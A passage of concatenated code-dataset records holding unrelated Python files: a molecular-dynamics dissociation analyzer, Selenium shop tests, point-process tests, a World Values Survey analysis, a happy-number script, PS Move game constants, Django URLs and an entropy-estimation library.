range(0,5): # last index excluded, upper diagonal l matrix, first index < second one\n h_bonds.append(dist_mat[heavy_atom][hydrogen_atom])\n #print(hydrogen_atom,heavy_atom,\" : \",dist_mat[heavy_atom][hydrogen_atom])\n \n shortest_bond = min((j,i) for i,j in enumerate(h_bonds)) # find the smallest bod and print heavy atom related to it, enumerate over heavy atoms 0 - 5\n h_bonds.clear() # dont need anymore \n \n #1a) how many hydrogens are on each heavy atom\n if shortest_bond[0] < H_diss_dist: \n h_ats_on_heavies[shortest_bond[1]] = h_ats_on_heavies[shortest_bond[1]] + 1\n else : \n h_diss = h_diss + 1 \n h_diss_index.append(shortest_bond[1])\n if h_diss >= 2: \n print(\"2 diss H CAREFULL\")\n #print(\"Sn,C,C,C,O: \",h_ats_on_heavies) \n if h_ats_on_heavies[0] > 0: exit(\"########## H transfer to Sn, check!!!!! 
#####\")\n#2) Where are the heavy atoms \n oh_diss = 0 # OH group diss 0/1\n me_diss = 0 # Methyl group diss / if h_diss = 0 otherwise CH2, CH1 possible\n \n # Sn-O\n if dist_mat[0][4] > SnX_bond_dist: oh_diss = oh_diss + 1\n \n # Sn-C\n for heavy_atom in range(1,4): \n if dist_mat[0][heavy_atom] > SnX_bond_dist: \n me_diss = me_diss + 1\n if (oh_diss == 0 and h_ats_on_heavies[heavy_atom] == 2) : channel = 8\n\n\n \"\"\"\n Channels:\n 0 nothing happened\n 1 1 Methyl diss\n 2 1 OH diss \n 3 2 Methyl diss \n 4 OH + Methyl diss\n 5 OH + 2 or more Methyl diss\n 6 H diss + komplex\n 7 H diss (komplex + O + H)\n 8 H diss (komplex + CH2 + H)\n 9 3 Methyl diss\n \"\"\" \n if h_diss == 0:\n if oh_diss == 0: \n if me_diss == 1: channel = 1 \n elif me_diss == 2: channel = 3 \n elif me_diss == 3: channel = 9 \n elif oh_diss == 1:\n if me_diss == 0: channel = 2 \n elif me_diss == 1: channel = 4 \n elif me_diss == 2: channel = 5 \n elif me_diss == 3: channel = 5\n elif h_diss == 1:\n if (me_diss == 0 and oh_diss == 0): channel = 6\n if (me_diss == 0 and oh_diss == 1 and h_ats_on_heavies[4] == 0) : channel = 7 #H from O group \n #print(' channel,h_diss,me_diss,oh_diss,sum(h_ats_on_heavies:',channel,h_diss,me_diss,oh_diss,sum(h_ats_on_heavies)) \n #print(\"----------------------------------\")\n \n #if channel == 9: print(\"unknown geom or nothing happened\") \n return channel,h_diss \n \ndef channel_statistics(analyze_geoms):\n \"\"\"\n MODIFIE PARAMETERS FOR EACH TYPE OF MOLECULE (n_channels)\n nstep, timestep depends on simulation number of steps (e.g. nsteps in input.in)\n \"\"\"\n AU_TO_FS = 0.024189\n n_channels = 10\n n_steps = 2100 + 1 # number of simulation steps, +1 since upper limit index is exluded\n timestep = 10 # \n procentual = 1 # 0 - 1 or 0-100\n \n channel_pop = np.zeros(shape=(n_steps,n_channels)) # 2D array, 0 column time, rest {1,n_channel} are channels\n #totpop = np.zeros(shape=(n_steps)) # no need to store totpop in each step\n print(\"Total number of geoms: \",len(analyze_geoms)-1)\n for rec in range(1,len(analyze_geoms)): # first row is 0,0 entry from array init\n channel = int(analyze_geoms[rec][1])\n step = int(analyze_geoms[rec][0])\n time = (step * timestep) * AU_TO_FS\n channel_pop[step][channel] = channel_pop[step][channel] + 1 \n for step in range(1,n_steps): \n totpop = sum(channel_pop[step])\n time = (step * timestep) * AU_TO_FS\n for chan in range(0,n_channels):\n channel_pop[step][chan] = (channel_pop[step][chan]/totpop) * procentual \n line = ( str('%.4f ' %time) + (\" \".join(\"%.3f\" %n for n in channel_pop[step])) + \"\\n\")\n \n #WRITE EACH LINE\n with open(results_file, 'a') as res_file:\n res_file.write(line)\n res_file.close()\n \n##############################################\n ########## MAIN ##########\n##############################################\n\nmolecule,movies,geoms=input_check()\nprint(\"Molecule: \",molecule,\"\\n Geoms: \",geoms)\nprint(\"#######################\\n\")\n\nanalyze_geoms = process_movies(movies,geoms) # np.array returning time, channel over all geoms\n#print(analyze_geoms)\nstatistic = channel_statistics(analyze_geoms)\n\n\n\n#distance_matrix(movies)\n","sub_path":"tin-analyzer.py","file_name":"tin-analyzer.py","file_ext":"py","file_size_in_byte":14908,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"335752011","text":"import pytest\nimport time\n\nfrom .pages.basket_page import BasketPage\nfrom .pages.product_page import ProductPage\nfrom .pages.login_page import 
LoginPage\n\nproduct_url = \"http://selenium1py.pythonanywhere.com/catalogue/coders-at-work_207/\"\nregistration_url = \"http://selenium1py.pythonanywhere.com/accounts/login/\"\n\n\n@pytest.mark.login\nclass TestLoginFromProductPage:\n @pytest.fixture(scope=\"function\", autouse=True)\n def setup(self):\n self.link = product_url\n yield\n pass\n\n @pytest.mark.need_review\n def test_guest_can_go_to_login_page_from_product_page(self, browser):\n page = ProductPage(browser, self.link)\n page.open()\n page.go_to_login_page()\n login_page = LoginPage(browser, browser.current_url)\n login_page.should_be_login_page()\n\n def test_guest_should_see_login_link(self, browser):\n page = ProductPage(browser, self.link)\n page.open()\n page.should_be_login_link()\n\n\nclass TestUserAddToBasketFromProductPage:\n\n @pytest.fixture(scope=\"function\", autouse=True)\n def setup(self, browser):\n page = LoginPage(browser, registration_url)\n page.open()\n email = str(time.time()) + \"@fakemail.org\"\n page.register_new_user(email, \"test_password\")\n page.should_be_authorized_user()\n\n def test_user_cant_see_success_message(self, browser):\n page = ProductPage(browser, product_url)\n page.open()\n page.is_result_messages_not_present()\n\n @pytest.mark.need_review\n def test_user_can_add_product_to_basket(self, browser):\n page = ProductPage(browser, product_url+\"?promo=offer1\")\n page.open()\n page.should_be_product_page()\n page.add_to_basket_page()\n page.solve_quiz_and_get_code()\n page.should_be_success_added_page()\n\n\n@pytest.mark.need_review\n@pytest.mark.parametrize('link', [product_url + \"?promo=offer0\",\n product_url + \"?promo=offer1\",\n product_url + \"?promo=offer2\",\n product_url + \"?promo=offer3\",\n product_url + \"?promo=offer4\",\n product_url + \"?promo=offer5\",\n product_url + \"?promo=offer6\",\n pytest.param(product_url + \"?promo=offer7\", marks=pytest.mark.xfail),\n product_url + \"?promo=offer8\",\n product_url + \"?promo=offer9\"])\ndef test_guest_can_add_product_to_basket(browser, link):\n page = ProductPage(browser, link)\n page.open()\n page.should_be_product_page()\n page.add_to_basket_page()\n page.solve_quiz_and_get_code()\n page.should_be_success_added_page()\n\n\n@pytest.mark.xfail\ndef test_guest_cant_see_success_message_after_adding_product_to_basket(browser):\n page = ProductPage(browser, product_url)\n page.open()\n page.add_to_basket_page()\n page.is_result_messages_not_present()\n\n\ndef test_guest_cant_see_success_message(browser):\n page = ProductPage(browser, product_url)\n page.open()\n page.is_result_messages_not_present()\n\n\n@pytest.mark.xfail\ndef test_message_disappeared_after_adding_product_to_basket(browser):\n page = ProductPage(browser, product_url)\n page.open()\n page.add_to_basket_page()\n page.is_result_messages_disappeared()\n\n\n@pytest.mark.need_review\ndef test_guest_cant_see_product_in_basket_opened_from_product_page(browser):\n page = ProductPage(browser, product_url)\n page.open()\n page.go_to_basket()\n basket_page = BasketPage(browser, browser.current_url)\n basket_page.should_be_empty()\n","sub_path":"test_product_page.py","file_name":"test_product_page.py","file_ext":"py","file_size_in_byte":3679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"34440708","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport numpy as np\n\nimport matplotlib.pyplot as plt\nfrom stppg import HawkesLam, SpatialTemporalPointProcess, StdDiffusionKernel, GaussianDiffusionKernel, 
GaussianMixtureDiffusionKernel\nfrom utils import plot_spatio_temporal_points, plot_spatial_intensity, plot_spatial_kernel, DataAdapter\n\ndef test_std_diffusion():\n '''\n Test Spatio-Temporal Point Process Generator equipped with \n standard diffusion kernel\n '''\n # parameters initialization\n mu = .1\n kernel = StdDiffusionKernel(C=1., beta=1., sigma_x=.1, sigma_y=.1)\n lam = HawkesLam(mu, kernel, maximum=1e+3)\n pp = SpatialTemporalPointProcess(lam)\n\n # generate points\n points, sizes = pp.generate(\n T=[0., 10.], S=[[-1., 1.], [-1., 1.]], \n batch_size=100, verbose=True)\n print(points)\n print(sizes)\n\n # read or save to local npy file.\n # points = np.load('results/tf_thining_samples.npy')\n np.save('results/hpp_Feb_25.npy', points)\n\n # plot intensity of the process over the time\n plot_spatial_intensity(lam, points[0], S=[[0., 10.], [-1., 1.], [-1., 1.]],\n t_slots=1000, grid_size=50, interval=50)\n\ndef test_gaussian_diffusion():\n '''\n Test Spatio-Temporal Point Process Generator equipped with \n Gaussian diffusion kernel\n '''\n mu = .1\n kernel = GaussianDiffusionKernel(\n layers=[5, 5], C=1., beta=1., \n SIGMA_SHIFT=.2, SIGMA_SCALE=.05, MU_SCALE=.1, is_centered=True)\n lam = HawkesLam(mu, kernel, maximum=1e+3)\n pp = SpatialTemporalPointProcess(lam)\n print(kernel.Ws)\n print(kernel.bs)\n\n # plot kernel parameters over the spatial region.\n plot_spatial_kernel(\"results/kernel.pdf\", kernel, S=[[-1., 1.], [-1., 1.]], grid_size=50)\n\n # generate points\n points, sizes = pp.generate(\n T=[0., 10.], S=[[-1., 1.], [-1., 1.]], \n batch_size=2, verbose=True)\n print(points)\n print(sizes)\n\n # read or save to local npy file.\n # points = np.load('results/free_hpp_Mar_15_layer_5.npy')\n # np.save('results/gaussian_hpp_Mar_15_layer_5.npy', points)\n\n # plot intensity of the process over the time\n plot_spatial_intensity(lam, points[0], S=[[0., 10.], [-1., 1.], [-1., 1.]],\n t_slots=1000, grid_size=50, interval=50)\n\ndef test_random_gaussian_mixture_diffusion():\n '''\n Test Spatio-Temporal Point Process Generator equipped with \n random Gaussian mixture diffusion kernel\n '''\n mu = .2\n kernel = GaussianMixtureDiffusionKernel(\n n_comp=5, layers=[5, 5], C=1., beta=1., \n SIGMA_SHIFT=.2, SIGMA_SCALE=.05, MU_SCALE=.05)\n lam = HawkesLam(mu, kernel, maximum=1e+3)\n pp = SpatialTemporalPointProcess(lam)\n\n # generate points\n points, sizes = pp.generate(\n T=[0., 10.], S=[[-1., 1.], [-1., 1.]], \n batch_size=2, verbose=True)\n print(points.shape)\n print(sizes)\n\n # read or save to local npy file.\n # points = np.load('results/free_hpp_Mar_15_layer_5.npy')\n # np.save('results/gaussian_hpp_Mar_15_layer_5.npy', points)\n\n # plot intensity of the process over the time\n plot_spatial_intensity(lam, points[0], S=[[0., 10.], [-1., 1.], [-1., 1.]],\n t_slots=1000, grid_size=50, interval=50)\n\ndef test_pretrain_gaussian_mixture_diffusion():\n '''\n Test Spatio-Temporal Point Process Generator equipped with \n pretrained Gaussian mixture diffusion kernel\n '''\n params = np.load('data/ambulance_mle_gaussian_mixture_params.npz')\n mu = params['mu']\n beta = params['beta']\n kernel = GaussianMixtureDiffusionKernel(\n n_comp=5, layers=[5], C=1., beta=beta, \n SIGMA_SHIFT=.05, SIGMA_SCALE=.2, MU_SCALE=.01,\n Wss=params['Wss'], bss=params['bss'], Wphis=params['Wphis'])\n lam = HawkesLam(mu, kernel, maximum=1e+3)\n pp = SpatialTemporalPointProcess(lam)\n\n # # generate points\n # points, sizes = pp.generate(\n # T=[0., 10.], S=[[-1., 1.], [-1., 1.]], \n # batch_size=2, verbose=True)\n 
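# The SpatialTemporalPointProcess sampler exercised in these tests (note the
# `maximum=1e+3` bound passed to HawkesLam) presumably relies on thinning.
# For intuition, a minimal 1-D temporal version of Ogata's thinning algorithm --
# an illustrative sketch with hypothetical names, not the stppg implementation:
import numpy as np

def thinning_1d(lam, T, lam_max, seed=None):
    # propose events from a homogeneous Poisson process at rate lam_max and
    # accept each proposal with probability lam(t, history) / lam_max
    rng = np.random.default_rng(seed)
    t, events = 0.0, []
    while True:
        t += rng.exponential(1.0 / lam_max)
        if t > T:
            return np.array(events)
        if rng.uniform() * lam_max <= lam(t, events):
            events.append(t)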
# print(points.shape)\n # print(sizes)\n\n # read or save to local npy file.\n points = np.load('data/ambulance.perday.npy')\n da = DataAdapter(init_data=points)\n points = da.normalize(points)\n # np.save('results/gaussian_hpp_Mar_15_layer_5.npy', points)\n print(points[0].shape)\n\n # plot intensity of the process over time\n plot_spatial_intensity(lam, points[0], S=[[0., 10.], [-1., 1.], [-1., 1.]],\n t_slots=1000, grid_size=50, interval=50)\n\n\nif __name__ == '__main__':\n np.random.seed(1)\n np.set_printoptions(suppress=True)\n\n test_pretrain_gaussian_mixture_diffusion()\n\n # T = [0., 10.]\n # S = [[-1., 1.], [-1., 1.]]\n\n # mu = .1\n # # kernel = StdDiffusionKernel(C=1., beta=1., sigma_x=.08, sigma_y=.08)\n # kernel = GaussianMixtureDiffusionKernel(\n # n_comp=5, layers=[5], \n # beta=1., C=1., SIGMA_SHIFT=.1, SIGMA_SCALE=.15, MU_SCALE=.1,\n # Wss=None, bss=None, Wphis=None)\n # lam = HawkesLam(mu, kernel, maximum=1e+3)\n # pp = SpatialTemporalPointProcess(lam)\n\n # points = np.load('data/apd.crime.perday.npy')\n # print(len(np.nonzero(points[0, :, 0])[0]))\n # print(points[0])\n\n # plot_spatial_intensity(lam, points[0], S=[[0., 10.], [-1., 1.], [-1., 1.]],\n # t_slots=1000, grid_size=50, interval=100)\n\n # # t = np.array([10])\n # # s = np.array([1,1])\n # # his_t = np.array([1, 2, 3])\n # # his_s = np.array([[.1, .2] ,[.2, .3], [.3, .4]])\n # # kernel.nu(t, s, his_t, his_s)","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":5532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"}
{"seq_id":"326233981","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nWorld Value Survey\r\nPlaying with the data\r\nGerson Vasconcelos\r\n\"\"\"\r\n\r\nimport pandas as pd\r\nimport seaborn as sns\r\nimport matplotlib.pyplot as plt\r\nimport os\r\nimport numpy as np\r\nfrom scipy import stats\r\n\r\nos.listdir() # list the current directory\r\n\r\nwvs = pd.read_csv('WV6_Data_ascii_v_2015_04_18.dat',\r\n header = None)\r\n# header = None says the variables have no names\r\n\r\n\r\nwvs.shape # size of the dataset\r\nwvs.columns # column names\r\n\r\n# 76 is Brazil and 12 is Algeria; number of respondents in Brazil and Algeria\r\nwvs.loc[(wvs[1] == 76) | \r\n (wvs[2] == 12), 1].value_counts()\r\n\r\n# variable 10 is the happiness item; recode as NaN (these codes mean no answer; check the variable dictionary)\r\nwvs.loc[wvs[10] == -2, 10] =np.nan\r\nwvs.loc[wvs[10] == -5, 10] =np.nan\r\nwvs.loc[wvs[10] == -1, 10] =np.nan\r\n\r\n# number of people who answered the happiness question\r\nwvs[10].value_counts()\r\n\r\n# as percentages, also rounded to 2 decimal places\r\nround(((wvs[10].value_counts()/\\\r\nwvs[10].value_counts().sum()) * 100), 2)\r\n\r\n# where are people happier, Brazil (code 76) or the USA (code 840)?\r\n\r\n# Brazil\r\nround(((wvs.loc[wvs[1] == 76, 10].value_counts() /\\\r\nwvs.loc[wvs[1] == 76, 10].value_counts().sum()) * 100), 2)\r\n\r\n# USA\r\nround(((wvs.loc[wvs[1] == 840, 10].value_counts() /\\\r\nwvs.loc[wvs[1] == 840, 10].value_counts().sum()) * 100), 2)\r\n\r\n# comparing mean happiness between BRA and USA\r\nwvs.loc[wvs[1] == 840, 10].mean()\r\nwvs.loc[wvs[1] == 76, 10].mean()\r\n\r\nhappyBrazil = wvs.loc[wvs[1] == 76, 10]\r\nhappyUS = wvs.loc[wvs[1] == 840, 10]\r\n\r\n# no need to pass the means to scipy; it computes them itself\r\nt, p1 = stats.ttest_ind(happyBrazil,\r\n happyUS,\r\n nan_policy = 'omit')\r\n\r\nprint(f'The test statistic was {t}. \\n The p-value was {p1}.')\r\n\r\n\r\n\r\n# testing whether the importance given to politics relates to the importance\r\n# people give to family\r\n\r\n#### selecting the variables of interest: family, friends, free time,\r\n# politics, work and religion\r\n\r\n# family\r\nwvs[4].value_counts()\r\n\r\n# converting non-response (NR) categories to NaN\r\nwvs.loc[wvs[4] == -2, 4] =np.nan\r\nwvs.loc[wvs[4] == -5, 4] =np.nan\r\nwvs.loc[wvs[4] == -1, 4] =np.nan\r\n\r\nwvs[4].value_counts()\r\n\r\n# politics\r\nwvs[7].value_counts()\r\n\r\nwvs.loc[wvs[7] == -2, 7] =np.nan\r\nwvs.loc[wvs[7] == -5, 7] =np.nan\r\nwvs.loc[wvs[7] == -1, 7] =np.nan\r\nwvs.loc[wvs[7] == -3, 7] =np.nan\r\n\r\nwvs[7].value_counts()\r\n\r\n# plotting the importance of family and politics\r\n\r\n#1) using seaborn (family)\r\nsns.set(color_codes = True) # set defines the plot style\r\nsns.countplot(x = wvs[4])\r\nplt.title('Importance Given to Family')\r\nplt.xlabel('Family')\r\nplt.ylabel('Frequency')\r\nplt.show()\r\n\r\n#2) using matplotlib (TO FIX)\r\n#plt.bar(x = wvs[4], height = True)\r\n#plt.title('Importance Given to Family')\r\n#plt.xlabel('Family')\r\n#plt.ylabel('Frequency')\r\n#plt.show()\r\n\r\n#3) using pandas\r\nwvs[4].value_counts().plot(kind = 'bar')\r\nplt.show()\r\n\r\n# plotting politics\r\n\r\nsns.set(color_codes = True) # set defines the plot style\r\nsns.countplot(x = wvs[7])\r\nplt.title('Importance Given to Politics')\r\nplt.xlabel('Politics')\r\nplt.ylabel('Frequency')\r\nplt.show()\r\n\r\n# test whether the two are associated:\r\n# does the way a person thinks about politics relate to the way\r\n# that person thinks about family?\r\n\r\n# create a cross-tabulation\r\ntabela = pd.crosstab(wvs[4], wvs[7])\r\n\r\n# chi-square test for the association between categorical variables\r\n\r\n# unpack each of the results it returns\r\nchi2, p, dof, expec = stats.chi2_contingency(tabela)\r\nprint(f'Chi-square: {chi2}')\r\nprint(f'P-value: {p}')\r\nprint(f'Degrees of Freedom: {dof}')\r\n\r\n###\r\n\r\n","sub_path":"wvs/aula_pyOO_5.py","file_name":"aula_pyOO_5.py","file_ext":"py","file_size_in_byte":3891,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"}
{"seq_id":"242695882","text":"n=int(input(\"enter the number\"))\nsum=0\n\nwhile n>0:\n rem=n%10\n square=rem*rem\n sum+=square\n n=n//10\n# keep replacing the number by the sum of its squared digits until we reach 1 (happy)\n# or the 4-cycle that every unhappy number falls into\nwhile sum != 1 and sum != 4:\n n=sum\n sum=0\n while n>0:\n rem=n%10\n square=rem*rem\n sum+=square\n n=n//10\nif sum == 1:\n print(\"It is a Happy number\")\nelse:\n print(\"not a happy number\")\n","sub_path":"other code practice/happy numbers.py","file_name":"happy numbers.py","file_ext":"py","file_size_in_byte":352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"}
{"seq_id":"132240632","text":"import psmove\nimport colorsys\nimport time\nfrom enum import Enum\n\ncolor_range = 255\n\n#Human speeds[slow, mid, fast]\nSLOW_WARNING = [0.1, 0.15, 0.28]\nSLOW_MAX = [0.5, 0.8, 1]\nFAST_WARNING = [0.5, 0.6, 0.8]\nFAST_MAX = [1, 1.4, 1.8]\n\nWERE_SLOW_WARNING = [0.2, 0.3, 0.4]\nWERE_SLOW_MAX = [0.7, 0.9, 1.1]\nWERE_FAST_WARNING = [0.6, 0.7, 0.9]\nWERE_FAST_MAX = [1.1, 1.5, 2.0]\n\nZOMBIE_WARNING = [0.5, 0.6, 0.8]\nZOMBIE_MAX = [0.8, 1, 1.4]\n\ndef hsv2rgb(h, s, v):\n return tuple(int(color * color_range) for color in colorsys.hsv_to_rgb(h, s, 
v))\n\ndef generate_colors(color_num):\n Hue = [ ((num + 1.0)/color_num, 1, 1) for num in range(color_num) ]\n colors = [ hsv2rgb(*hsv_color) for hsv_color in Hue ]\n return colors\n\n\ndef get_move(serial, move_num):\n time.sleep(0.02)\n move = psmove.PSMove(move_num)\n time.sleep(0.05)\n if move.get_serial() != serial:\n for move_num in range(psmove.count_connected()):\n move = psmove.PSMove(move_num)\n if move.get_serial() == serial:\n return move\n return None\n else:\n return move\n\ndef lerp(a, b, p):\n return a*(1 - p) + b*p\n\ndef change_color(color_array, r, g, b):\n color_array[0] = r\n color_array[1] = g\n color_array[2] = b\n\nclass Games(Enum):\n JoustFFA = 0\n JoustTeams = 1\n JoustRandomTeams = 2\n Traitor = 3\n WereJoust = 4\n Zombies = 5\n Commander = 6\n Swapper = 7\n Tournament = 8\n Ninja = 9\n Random = 10\n\nminimum_players = {\n Games.JoustFFA.value: 2,\n Games.JoustTeams.value: 3,\n Games.JoustRandomTeams.value: 3,\n Games.Traitor.value: 6,\n Games.WereJoust.value: 3,\n Games.Zombies.value: 4,\n Games.Commander.value: 4,\n Games.Swapper.value: 3,\n Games.Tournament.value: 3,\n Games.Ninja.value: 2,\n Games.Random.value: 2\n}\n\ngame_mode_names = {\n Games.JoustFFA.value: 'Joust Free-for-All',\n Games.JoustTeams.value: 'Joust Teams',\n Games.JoustRandomTeams.value: 'Joust Random Teams',\n Games.Traitor.value: 'Traitors',\n Games.WereJoust.value: 'Werewolves',\n Games.Zombies.value: 'Zombies',\n Games.Commander.value: 'Commander',\n Games.Swapper.value: 'Swapper',\n Games.Tournament.value: 'Tournament',\n Games.Ninja.value: 'Ninja Bomb',\n Games.Random.value: 'Random'\n}\n\nclass Buttons(Enum):\n middle = 524288\n start = 2048\n select = 256\n circle = 32\n nothing = 0\n\nbattery_levels = {\n 0: \"Low\",\n 1: \"20%\",\n 2: \"40%\",\n 3: \"60%\",\n 4: \"80%\",\n 5: \"100%\",\n 238: \"Charging\",\n 239: \"Charged\"\n}","sub_path":"common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":2529,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"20095606","text":"from django.conf.urls import patterns, url\n\nfrom clients import views\n\nurlpatterns = patterns('',\n url(r'^$', views.IndexView.as_view(), name='index'),\n url(r'^new$', views.ClientCreate.as_view(), name='new'),\n url(r'^(?P<pk>\\d+)/$', views.DetailView.as_view(), name='detail'),\n url(r'^update/(?P<pk>\\d+)/$', views.ClientUpdate.as_view(), name='update'),\n)","sub_path":"clients/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"157300469","text":"# -*- coding: utf-8 -*-\n# Author: Simone Marsili <simomarsili@gmail.com>\n# License: BSD 3 clause\n\"\"\"\nFunctions for entropy and information measures estimation.\n\"\"\"\nimport logging\n\nimport numpy\n\nfrom ndd.estimators import Entropy, JSDivergence\nfrom ndd.exceptions import (CardinalityError, CombinationError, DataArrayError,\n EstimatorInputError, PmfError)\n\n__all__ = [\n 'entropy',\n 'from_data',\n 'jensen_shannon_divergence',\n 'kullback_leibler_divergence',\n 'interaction_information',\n 'coinformation',\n 'mutual_information',\n 'conditional_entropy',\n 'histogram',\n]\n\nlogger = logging.getLogger(__name__)\n\n\ndef entropy(pk, k=None, alpha=None, plugin=False, return_std=False):\n \"\"\"\n Entropy estimate from an array of counts.\n\n Return a Bayesian estimate for the entropy of an unknown discrete\n distribution from an input array of counts pk.\n\n 
Parameters\n ----------\n pk : array-like\n The number of occurrences of a set of bins.\n k : int or array-like, optional\n Total number of bins (including unobserved bins); k >= len(pk).\n A float is a valid input for whole numbers (e.g. k=1.e3).\n If an array, set k = numpy.prod(k). Defaults to len(pk).\n alpha : float, optional\n If not None: Wolpert-Wolf entropy estimator (fixed alpha).\n Use a single Dirichlet prior with concentration parameter alpha.\n alpha > 0.0.\n plugin : boolean, optional\n If True, return a 'plugin' estimate of the entropy. The discrete\n distribution is estimated from the empirical frequencies over bins\n and inserted into the entropy definition (plugin estimator).\n If alpha is passed in combination with plugin=True, add\n alpha pseudocounts to each frequency count (pseudocount estimator).\n return_std : boolean, optional\n If True, also return an approximation for the standard deviation\n over the entropy posterior.\n\n Returns\n -------\n entropy : float\n Entropy estimate.\n std : float, optional\n Uncertainty in the entropy estimate. Only if `return_std` is True.\n\n \"\"\"\n\n # pk is an array of counts\n estimator = Entropy(alpha, plugin).fit(pk, k)\n S, err = estimator.estimate_, estimator.err_\n\n if numpy.isnan(S):\n logger.warning('nan value for entropy estimate')\n S = numpy.nan\n\n if return_std:\n if err is not None and numpy.isnan(err):\n err = numpy.nan\n logger.warning('nan value for entropy posterior std deviation')\n return S, err\n\n return S\n\n\ndef from_data(ar, ks=None, axis=1, r=None):\n \"\"\"\n Entropy estimate from data matrix.\n\n Parameters\n ----------\n ar : array-like, shape (p, n)\n 2D array of n samples from p discrete variables.\n ks : int or 1D array of length p, optional\n Alphabet size for each variable.\n axis : int, optional\n The sample-indexing axis. Defaults to 1.\n r : int, optional; 1<=r<=p.\n If passed, return a generator yielding estimates for the p-choose-r\n possible combinations of r variables.\n\n Returns\n -------\n float\n Entropy estimate\n\n \"\"\"\n from itertools import combinations\n\n # check data shape\n ar = _check_data(ar, axis)\n\n # EntropyBasedEstimator objects are callable and return the fitted estimate\n estimator = Entropy()\n\n ks = _check_ks(ks, ar)\n\n if r is not None:\n if ks.ndim == 0:\n raise CardinalityError('For combinations, ks cant be a scalar')\n r = _check_r(r, ar)\n\n counts_combinations = histogram(ar, r=r)\n alphabet_size_combinations = (numpy.prod(x)\n for x in combinations(ks, r=r))\n return (\n estimator(*args)\n for args in zip(counts_combinations, alphabet_size_combinations))\n\n counts = histogram(ar)\n return estimator(counts, k=ks)\n\n\ndef jensen_shannon_divergence(pk, k=None, alpha=None, plugin=False):\n \"\"\"\n Return the Jensen-Shannon divergence from a m-by-p matrix of counts.\n\n Return an estimate of the Jensen-Shannon divergence between\n m unknown discrete distributions from a m-by-p input array of counts.\n The estimate (in nats) is computed as a combination of single Bayesian\n entropy estimates. If the total number of samples varies among the\n distributions, the function returns a weighted divergence with weights\n proportional to the total number of samples in each row\n (see the general definition of Jensen-Shannon divergence:\n https://en.wikipedia.org/wiki/Jensen-Shannon_divergence).\n\n Parameters\n ----------\n\n pk : array-like, shape (m, p)\n Matrix of frequency counts. 
Each row corresponds to the number of\n occurrences of a set of bins from a different distribution.\n k : int or array-like, optional\n Total number of bins (including unobserved bins); k >= p.\n A float is a valid input for whole numbers (e.g. k=1.e3).\n If an array, set k = numpy.prod(k). Defaults to p.\n alpha : float, optional\n If not None: Wolpert-Wolf entropy estimator (fixed alpha).\n Use a single Dirichlet prior with concentration parameter alpha.\n alpha > 0.0.\n plugin : boolean, optional\n If True, use a 'plugin' estimator for the entropy.\n If alpha is passed in combination with plugin == True, add alpha\n pseudocounts to the frequency counts in the plugin estimate.\n\n Returns\n -------\n float\n Jensen-Shannon divergence.\n\n \"\"\"\n\n estimator = JSDivergence(alpha, plugin).fit(pk, k)\n js = estimator.estimate_\n\n if numpy.isnan(js):\n logger.warning('nan value for JS divergence')\n js = numpy.nan\n\n return js\n\n\ndef kullback_leibler_divergence(pk, qk, k=None, alpha=None, plugin=False):\n \"\"\"\n Kullback-Leibler divergence given counts pk and a reference PMF qk.\n\n Return an estimate of the Kullback-Leibler given an array of counts pk and\n a reference PMF qk. The estimate (in nats) is computed as:\n - S_p - sum(pk * log(qk)) / sum(pk)\n where S_p is the entropy estimate from counts pk.\n\n Parameters\n ----------\n pk : array_like\n The number of occurrences of a set of bins.\n qk : array_like\n Reference PMF in sum(pk * log(pk/qk)). len(qk) = len(pk).\n Must be a valid PMF (non-negative, normalized).\n k : int or array-like, optional\n Total number of bins (including unobserved bins); k >= p.\n A float is a valid input for whole numbers (e.g. k=1.e3).\n If an array, set k = numpy.prod(k). Defaults to len(pk).\n alpha : float, optional\n If not None: Wolpert-Wolf entropy estimator (fixed alpha).\n Use a single Dirichlet prior with concentration parameter alpha.\n alpha > 0.0.\n plugin : boolean, optional\n If True, use a 'plugin' estimator for the entropy.\n If alpha is passed in combination with plugin == True, add alpha\n pseudocounts to the frequency counts in the plugin estimate.\n\n Returns\n -------\n float\n Kullback-Leibler divergence.\n\n \"\"\"\n\n if is_pmf(qk):\n log_qk = numpy.log(qk)\n else:\n raise PmfError('qk must be a valid PMF')\n\n if len(log_qk) != len(pk):\n raise PmfError('qk and pk must have the same length.')\n\n if k == 1: # single bin\n kl = 0.0\n else:\n estimator = Entropy(alpha, plugin).fit(pk, k)\n kl = -estimator.estimate_ - numpy.sum(pk * log_qk) / float(sum(pk))\n if numpy.isnan(kl):\n logger.warning('nan value for KL divergence')\n kl = numpy.nan\n\n return kl\n\n\ndef interaction_information(ar, ks=None, axis=1, r=None):\n \"\"\"Interaction information from data matrix.\n\n See Eq.10 in:\n Timme, Nicholas, et al.\n \"Synergy, redundancy, and multivariate information measures:\n an experimentalist's perspective.\"\n Journal of computational neuroscience 36.2 (2014): 119-140.\n\n Parameters\n ----------\n ar : array-like\n p-by-n array of n samples from p discrete variables.\n ks : 1D array of length p, optional\n Alphabet size for each variable.\n axis : int, optional\n The sample-indexing axis\n r : int, optional; 1<=r<=p.\n If passed, return a generator yielding estimates for the p-choose-r\n possible combinations of r variables.\n Combinations are ordered as: list(itertools.combinations(range(p), r)).\n\n Returns\n -------\n float\n Interaction information estimate.\n\n Raises\n ------\n CardinalityError\n If len(ks) != p.\n\n 
